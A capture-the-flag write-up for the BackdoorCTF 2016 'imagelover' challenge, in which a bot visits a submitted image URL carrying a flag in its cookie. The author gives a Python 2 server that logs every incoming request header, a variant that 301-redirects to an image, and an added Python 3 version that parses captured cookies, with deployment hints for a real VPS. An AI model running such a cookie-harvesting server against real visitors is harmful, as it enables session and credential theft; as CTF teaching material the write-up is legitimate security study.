BackdoorCTF 2016 - imagelover

BackdoorCTF is the annual flagship CTF competition conducted by SDSLabs and InfoSecIITR.

Points: 70


Find imagelover here


The challenge was updated. Scroll down to see the updated solution.

When I went to the specified website it said:

Imagelover loves viewing pictures of people. He has opened this website so that you can share your pics with him. Imagelover visits the image with his flag as a sign of gratitude.

There was a URL box to submit a link to a photo. Since it said “Imagelover visits the image with his flag”, the bot must fetch whatever URL we enter with a GET request and carry the flag in the request headers. So I googled and found this script, which prints the headers of anyone who sends a GET request to my VPS.

import SimpleHTTPServer
import SocketServer
import logging

PORT = 8000

class ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):

    def do_GET(self):
        logging.error(self.headers)  # dump every request header (cookies included) to stderr
        SimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)  # then serve the file as usual

Handler = ServerHandler

httpd = SocketServer.TCPServer(("", PORT), Handler)

print "serving at port", PORT
httpd.serve_forever()  # keep answering requests until killed


So now they don’t give us the flag until we return them a png, jpg or a gif. So I decided to redirect them to an image. For this I made some changes in the do_GET() method. Here is the updated method.

    def do_GET(self):
        logging.error(self.headers) # Still log the headers first; that is where the flag arrives
        self.send_response(301) # For a redirect we need to send a `301` response rather than `200`
        self.send_header('Location','') # Add a link to an image in place of ``
        self.end_headers() # Ends the header block; without it the redirect is never sent


Basically I hosted the script above on my VPS and entered its URL in place of a photograph URL. Imagelover would visit it and I would get the flag from the headers.
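The same capture-and-redirect trick in Python 3, as an added example that is not the script from the writeup: the handler records every request header, parses the Cookie header, and answers with a 301 to an image URL. The image URL and the cookie value are placeholders I made up, and the "bot" is simulated by a local urllib request that refuses to follow redirects, so the whole thing runs offline on 127.0.0.1.

```python
import http.server
import logging
import socketserver
import threading
import urllib.error
import urllib.request
from http.cookies import SimpleCookie

# Hypothetical image the visitor is redirected to; any real png/jpg/gif URL works.
IMAGE_URL = "https://example.com/cat.png"

# Headers of every request the server has seen, oldest first.
captured = []


def cookies_from_header(value):
    """Parse a raw Cookie header ("a=1; b=2") into {name: value}."""
    jar = SimpleCookie()
    jar.load(value or "")
    return {name: morsel.value for name, morsel in jar.items()}


class CaptureHandler(http.server.BaseHTTPRequestHandler):
    """Record the visitor's headers, then 301 them to a real image."""

    def do_GET(self):
        headers = dict(self.headers.items())
        captured.append(headers)
        logging.info("GET %s from %s cookies=%s", self.path,
                     self.client_address[0],
                     cookies_from_header(headers.get("Cookie")))
        self.send_response(301)
        self.send_header("Location", IMAGE_URL)
        self.end_headers()  # without this the redirect is never flushed

    def log_message(self, fmt, *args):
        pass  # silence the default per-request access log


def start_server(port=0):
    """Serve on 127.0.0.1 in a background thread; port 0 picks a free port."""
    srv = socketserver.TCPServer(("127.0.0.1", port), CaptureHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    def redirect_request(self, *args, **kwargs):
        return None  # surface the 301 as an HTTPError instead of following it


def simulate_visit(port, cookie):
    """Constructed stand-in for the challenge bot: one GET carrying a Cookie header."""
    req = urllib.request.Request("http://127.0.0.1:%d/pic.png" % port,
                                 headers={"Cookie": cookie})
    try:
        urllib.request.build_opener(_NoRedirect).open(req)
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Location")
    return None, None


def demo():
    """Run one capture end to end: (status, Location, cookies the server saw)."""
    srv = start_server()
    try:
        status, location = simulate_visit(srv.server_address[1],
                                          "flag=FLAG_PLACEHOLDER")  # constructed value
    finally:
        srv.shutdown()
        srv.server_close()
    return status, location, cookies_from_header(captured[-1].get("Cookie"))


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO)
    print(demo())
```

Running the file prints the tuple (301, the image URL, {'flag': 'FLAG_PLACEHOLDER'}); on a real VPS you would drop the simulation, bind to "" instead of 127.0.0.1, and read the captured cookie from the log line.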

And as expected, as soon as I submitted my URL I got a GET request with the flag in the cookie.

Akash Trehan
